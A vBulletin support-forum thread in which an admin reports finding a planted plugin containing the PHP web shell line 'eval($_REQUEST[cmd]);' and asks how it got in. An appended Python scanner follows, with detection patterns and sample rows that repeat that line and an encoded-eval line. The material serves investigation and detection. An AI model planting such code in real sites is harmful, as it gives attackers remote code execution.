Dangerous SQL injection vulnerability in 4:2:0?
jfxcube
08-01-2014, 02:06 PM
This week we found a new plugin (we are still investigating "how") with this code:
eval($_REQUEST[cmd]);
Apparently, in Apache logs and vBulletin logs there is nothing.
Do you know any known issues about this vulnerability in vBulletin 4.2.0 l2?
Seems to be similar to this one:
http://www.pcworld.com/article/2455500/emergency-vbulletin-patch-fixes-dangerous-sql-injection-vulnerability.html
This isn't present in vBulletin by default. It's a piece of code implemented by a hacker or someone who wants to do bad stuff.
jfxcube
08-01-2014, 02:43 PM
I knew that... I'm just asking if there is some known vulnerability in vBulletin 4.2.0 l2 that lets bad guys do some SQL injection in tables like plugin, so that I can save time investigating by myself to find the exploit used to inject that code.
ForceHSS
08-01-2014, 02:47 PM
We don't know what plugins you have or if you have the install folder still in your FTP, so it's hard to answer. The best way would be to get someone to log in and fix your problem if you don't know how to do it yourself.
As far as I know there is no public exploit for vBulletin 4.2+, a private exploit is always possible or a vulnerable plugin.
Paul M
08-01-2014, 02:49 PM
I'm just asking if there is some known vulnerability in vBulletin 4.2.0 l2 that lets bad guys do some SQL injection in tables like plugin.
No, there isn't.
Zachery
08-01-2014, 03:36 PM
In 4.2? If you've left the install folder around, yes. If you haven't, no.
jfxcube
08-01-2014, 05:19 PM
In 4.2? If you've left the install folder around, yes. If you haven't, no.
It's the first thing I've deleted after finishing installing it.
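One way to review the plugin table for code like the line quoted in the first post, as an added example that is not part of the thread or vBulletin's own code: it scans exported plugin rows for request data reaching code execution. The column names (pluginid, title, hookname, phpcode) and all sample rows are assumptions constructed for illustration.

```python
import re

# Functions that run a string as PHP code or as an OS command.
EXEC_CALL = r"\b(?:eval|assert|create_function|system|exec|shell_exec|passthru|popen|proc_open)"
# Superglobals filled directly from the HTTP request.
REQUEST_VAR = r"\$_(?:REQUEST|GET|POST|COOKIE)\b"
# Decoders often wrapped around a hidden payload.
DECODER = r"\b(?:base64_decode|gzinflate|gzuncompress|str_rot13)"

RULES = [
    ("request data reaches code execution",
     re.compile(EXEC_CALL + r"\s*\([^;]*" + REQUEST_VAR, re.I)),
    ("decoded blob passed to eval",
     re.compile(r"\beval\s*\([^;]*" + DECODER + r"\s*\(", re.I)),
]


def scan_plugins(rows):
    """Return (pluginid, title, hookname, reason) for each suspicious plugin row."""
    findings = []
    for pluginid, title, hookname, phpcode in rows:
        for reason, pattern in RULES:
            if pattern.search(phpcode):
                findings.append((pluginid, title, hookname, reason))
    return findings


# Constructed sample rows (pluginid, title, hookname, phpcode); not real data.
# Column layout is an assumption about how the plugin table was exported.
SAMPLE_ROWS = [
    (1, "Constructed: stats box", "global_start",
     "$stats = fetch_stats($vbulletin->db);"),
    (2, "Constructed: unknown plugin", "init_startup",
     "eval($_REQUEST[cmd]);"),
    (3, "Constructed: packed code", "global_start",
     "eval(gzinflate(base64_decode($blob)));"),
    (4, "Constructed: template eval", "global_start",
     "eval('$navbar = \"' . fetch_template('navbar') . '\";');"),
]

if __name__ == "__main__":
    for finding in scan_plugins(SAMPLE_ROWS):
        print(finding)
```

A match is a lead for manual review, not a verdict; code that copies request data into a variable before executing it is not caught by these patterns.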